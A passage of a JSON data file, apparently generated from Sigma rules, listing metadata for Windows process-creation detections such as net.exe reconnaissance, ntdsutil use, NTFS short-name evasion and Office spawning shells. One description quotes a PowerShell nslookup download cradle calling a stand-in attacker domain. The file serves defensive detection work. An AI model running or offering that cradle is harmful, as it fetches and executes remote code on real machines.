- "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23",
- "value": "Suspicious Scan Loop Network",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
- "https://ss64.com/nt/for.html",
- "https://ss64.com/ps/foreach-object.htmll",
-
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059",
- "attack.discovery",
- "attack.t1018"
- ],
- "creation_date": "2022/03/12",
- "filename": "proc_creation_win_network_scan_loop.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate script"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.",
- "uuid": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5",
- "value": "Network Sniffing",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_sniffing.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.discovery",
- "attack.t1040"
- ],
- "creation_date": "2019/10/21",
- "filename": "proc_creation_win_network_sniffing.yml",
- "author": "Timur Zinniatullin, oscd.community",
- "level": "low",
- "falsepositive": [
- "Admin activity"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'.
For example 'enable' or 'disable' accounts or change the password...etc",
- "uuid": "5b768e71-86f2-4879-b448-81061cbae951",
- "value": "Suspicious Manipulation Of Default Accounts",
- "meta": {
- "refs": [
- "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html",
- "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
- "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1560.001"
- ],
- "creation_date": "2022/09/01",
- "filename": "proc_creation_win_net_default_accounts_manipulation.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Some fasle positives could occure with the admin or guest account. It depends on the scripts being used by the admins in your env.
If you experience a lot of FP you could reduce the level to medium"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.",
- "uuid": "62510e69-616b-4078-b371-847da438cc03",
- "value": "Windows Network Enumeration",
- "meta": {
- "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_enum.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1018"
- ],
- "creation_date": "2018/10/30",
- "filename": "proc_creation_win_net_enum.yml",
- "author": "Endgame, JHasenbusch (ported for oscd.community)",
- "level": "low",
- "falsepositive": [
- "Legitimate use of net.exe utility by legitimate user"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE",
- "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0",
- "value": "Suspicious Reconnaissance Activity Using Net",
- "meta": {
- "refs": [
- "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_recon.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1087.001",
- "attack.t1087.002"
- ],
- "creation_date": "2019/01/16",
- "filename": "proc_creation_win_net_recon.yml",
- "author": "Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali",
- "level": "medium",
-
"falsepositive": [
- "Inventory tool runs",
- "Administrative activity"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Identifies creation of local users via the net.exe command.",
- "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc",
- "value": "Net.exe User Account Creation",
- "meta": {
- "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1136.001"
- ],
- "creation_date": "2018/10/30",
- "filename": "proc_creation_win_net_user_add.yml",
- "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)",
- "level": "medium",
- "falsepositive": [
- "Legitimate user creation.",
- "Better use event IDs for user creation rather than command line rules."
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects creation of local users via the net.exe command with the option \"never expire\"",
- "uuid": "b9f0e6f5-09b4-4358-bae4-08408705bd5c",
- "value": "Net.exe User Account Creation - Never Expire",
- "meta": {
- "refs": [
- "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1136.001"
- ],
- "creation_date": "2022/07/12",
- "filename": "proc_creation_win_net_user_add_never_expire.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects when an admin share is mounted using net.exe",
- "uuid": "3abd6094-7027-475f-9630-8ab9be7b9725",
- "value": "Mounted Windows Admin Shares with net.exe",
- "meta": {
- "refs": [
- "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_admin_share.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1021.002"
- ],
- "creation_date": "2020/10/05",
- "filename": "proc_creation_win_net_use_admin_share.yml",
- "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga",
- "level": "medium",
- "falsepositive": [
- "Administrators"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it",
- "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77",
- "value": "New Network Provider - CommandLine",
- "meta": {
- "refs": [
-
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade",
- "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_network_provider.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003"
- ],
- "creation_date": "2022/08/23",
- "filename": "proc_creation_win_new_network_provider.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Other legitimate network providers used and not filtred in this rule"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects creation of a new service.",
- "uuid": "7fe71fc9-de3b-432a-8d57-8c809efc10ab",
- "value": "New Service Creation",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_service_creation.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1543.003"
- ],
- "creation_date": "2019/10/21",
- "filename": "proc_creation_win_new_service_creation.yml",
- "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community",
- "level": "low",
- "falsepositive": [
- "Legitimate administrator or user creates a service for legitimate reasons."
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of nimgrab, a tool bundled with the Nim programming framework, downloading a file.
This can be normal behaviour on developer systems.",
- "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6",
- "value": "Nimgrab File Download",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nimgrab.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1105"
- ],
- "creation_date": "2022/08/28",
- "filename": "proc_creation_win_nimgrab.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Legitimate use of Nim on developer systems"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects nltest commands that can be used for information discovery",
- "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248",
- "value": "Recon Activity with NLTEST",
- "meta": {
- "refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)",
- "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/",
- "https://attack.mitre.org/techniques/T1482/",
- "https://attack.mitre.org/techniques/T1016/",
- "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1016",
- "attack.t1482"
- ],
- "creation_date": "2021/07/24",
- "filename": "proc_creation_win_nltest_recon.yml",
- "author": "Craig Young, oscd.community, Georg Lauenstein",
- "level": "medium",
- "falsepositive": [
- "Legitimate administration use but user must be check out"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the
execution node.exe which is shipped with multiple softwares such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc",
- "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd",
- "value": "Node.exe Process Abuse",
- "meta": {
- "refs": [
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
- "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return",
- "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/",
- "https://nodejs.org/api/cli.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1127"
- ],
- "creation_date": "2022/09/09",
- "filename": "proc_creation_win_node_abuse.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.",
- "uuid": "f4bbd493-b796-416e-bbf2-121235348529",
- "value": "Non Interactive PowerShell",
- "meta": {
- "refs": [
- "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_interactive_powershell.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2019/09/12",
- "filename": "proc_creation_win_non_interactive_powershell.yml",
- "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
- "level": "low",
- "falsepositive": [
- "Legitimate programs executing PowerShell scripts"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Search for
usage of reg or Powershell by non-privileged users to modify service configuration in registry",
- "uuid": "8f02c935-effe-45b3-8fc9-ef8696a9e41d",
- "value": "Non-privileged Usage of Reg or Powershell",
- "meta": {
- "refs": [
- "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_priv_reg_or_ps.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1112"
- ],
- "creation_date": "2020/10/05",
- "filename": "proc_creation_win_non_priv_reg_or_ps.yml",
- "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the use of NPS a port forwarding tool",
- "uuid": "68d37776-61db-42f5-bf54-27e87072d17e",
- "value": "NPS Tunneling Tool",
- "meta": {
- "refs": [
- "https://github.com/ehang-io/nps",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nps.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1090"
- ],
- "creation_date": "2022/10/08",
- "filename": "proc_creation_win_nps.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Legitimate use"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of powershell in conjunction with nslookup as a mean of download.",
- "uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23",
- "value": "Nslookup PowerShell Download",
- "meta": {
- "refs": [
- "https://twitter.com/Alh4zr3d/status/1566489367232651264",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ],
- "creation_date":
"2022/09/05",
- "filename": "proc_creation_win_nslookup_poweshell_download.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]",
- "uuid": "72671447-4352-4413-bb91-b85569687135",
- "value": "Nslookup PwSh Download Cradle",
- "meta": {
- "refs": [
- "https://twitter.com/alh4zr3d/status/1566489367232651264",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1105",
- "attack.t1071.004"
- ],
- "creation_date": "2022/09/06",
- "filename": "proc_creation_win_nslookup_pwsh_download_cradle.yml",
- "author": "Zach Mathis (@yamatosecurity)",
- "level": "medium",
- "falsepositive": "No established falsepositives",
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)",
- "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345",
- "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)",
- "meta": {
- "refs": [
- "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.003"
- ],
- "creation_date": "2019/01/16",
- "filename": "proc_creation_win_ntdsutil_usage.yml",
- "author": "Thomas Patzke",
- "level": "medium",
- "falsepositive": [
- "NTDS maintenance"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect use of the Windows 8.3
short name. Which could be used as a method to avoid command-line detection",
- "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969",
- "value": "Use Short Name Path in Command Line",
- "meta": {
- "refs": [
- "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
- "https://twitter.com/frack113/status/1555830623633375232",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564.004"
- ],
- "creation_date": "2022/08/07",
- "filename": "proc_creation_win_ntfs_short_name_path_use_cli.yml",
- "author": "frack113, Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process."
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect use of the Windows 8.3 short name.
Which could be used as a method to avoid Image detection",
- "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1",
- "value": "Use Short Name Path in Image",
- "meta": {
- "refs": [
- "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
- "https://twitter.com/frack113/status/1555830623633375232",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564.004"
- ],
- "creation_date": "2022/08/07",
- "filename": "proc_creation_win_ntfs_short_name_path_use_image.yml",
- "author": "frack113, Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process."
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect use of the Windows 8.3 short name.
Which could be used as a method to avoid command-line detection",
- "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795",
- "value": "Use NTFS Short Name in Command Line",
- "meta": {
- "refs": [
- "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
- "https://twitter.com/jonasLyk/status/1555914501802921984",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564.004"
- ],
- "creation_date": "2022/08/05",
- "filename": "proc_creation_win_ntfs_short_name_use_cli.yml",
- "author": "frack113, Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process."
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect use of the Windows 8.3 short name.
Which could be used as a method to avoid Image based detection",
- "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b",
- "value": "Use NTFS Short Name in Image",
- "meta": {
- "refs": [
- "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
- "https://twitter.com/jonasLyk/status/1555914501802921984",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564.004"
- ],
- "creation_date": "2022/08/06",
- "filename": "proc_creation_win_ntfs_short_name_use_image.yml",
- "author": "frack113, Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command",
- "uuid": "cb5a2333-56cf-4562-8fcb-22ba1bca728d",
- "value": "Obfuscated IP Download",
- "meta": {
- "refs": [
- "https://h.43z.one/ipconverter/",
- "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml"
- ],
- "tags": [
- "attack.discovery"
- ],
- "creation_date": "2022/08/03",
- "filename": "proc_creation_win_obfuscated_ip_download.yml",
- "author": "Florian Roth",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...)
via commandline", - "uuid": "56d19cb4-6414-4769-9644-1ed35ffbb148", - "value": "Obfuscated IP Via CLI", - "meta": { - "refs": [ - "https://h.43z.one/ipconverter/", - "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" - ], - "tags": [ - "attack.discovery" - ], - "creation_date": "2022/08/03", - "filename": "proc_creation_win_obfuscated_ip_via_cli.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", - "uuid": "518643ba-7d9c-4fa5-9f37-baed36059f6a", - "value": "Office Applications Spawning Wmi Cli", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_office_applications_spawning_wmi_commandline.yml", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Office Applications executing a Windows child process including directory traversal patterns", - "uuid": "868955d9-697e-45d4-a3da-360cefd7c216", - "value": "Office Directory Traversal 
CommandLine", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1531653369546301440", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2022/06/02", - "filename": "proc_creation_win_office_dir_traversal_cli.yml", - "author": "@SBousseaden (idea), Christian Burkard (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "uuid": "e1693bc8-7168-4eab-8718-cdcaa68a1738", - "value": "Office Processes Proxy Execution Through WMIC", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_proxy_exec_wmic.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_office_proxy_exec_wmic.yml", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio", - "uuid": "438025f9-5856-4663-83f7-52f878a70a50", - "value": "Microsoft Office Product Spawning 
Windows Shell", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2018/04/06", - "filename": "proc_creation_win_office_shell.yml", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", - "uuid": "04f5363a-6bca-42ff-be70-0d28bf629ead", - "value": "Office Applications Spawning Wmi Cli Alternate", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_office_spawning_wmi_commandline.yml", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio", - "uuid": 
"aa3a6f94-890e-4e22-b634-ffdfd54792cc", - "value": "MS Office Product Spawning Exe in User Dir", - "meta": { - "refs": [ - "sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c", - "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" - ], - "creation_date": "2019/04/02", - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml", - "author": "Jason Lynch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects svchost process spawning an instance of an office application. This happens when the initial word application create an instance of one of the office COM objects such as 'Word.Application', 'Excel.Application'...etc. This can be used by malicious actor to create a malicious office document with macros on the fly. 
(See vba2clr project in reference)", - "uuid": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", - "value": "Svchost Spawning Office Application", - "meta": { - "refs": [ - "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", - "https://github.com/med0x2e/vba2clr", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2022/10/13", - "filename": "proc_creation_win_office_svchost_child.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of office automation via scripting" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Outlook", - "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d", - "value": "Microsoft Outlook Product Spawning Windows Shell", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2022/02/28", - "filename": "proc_creation_win_outlook_shell.yml", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", - 
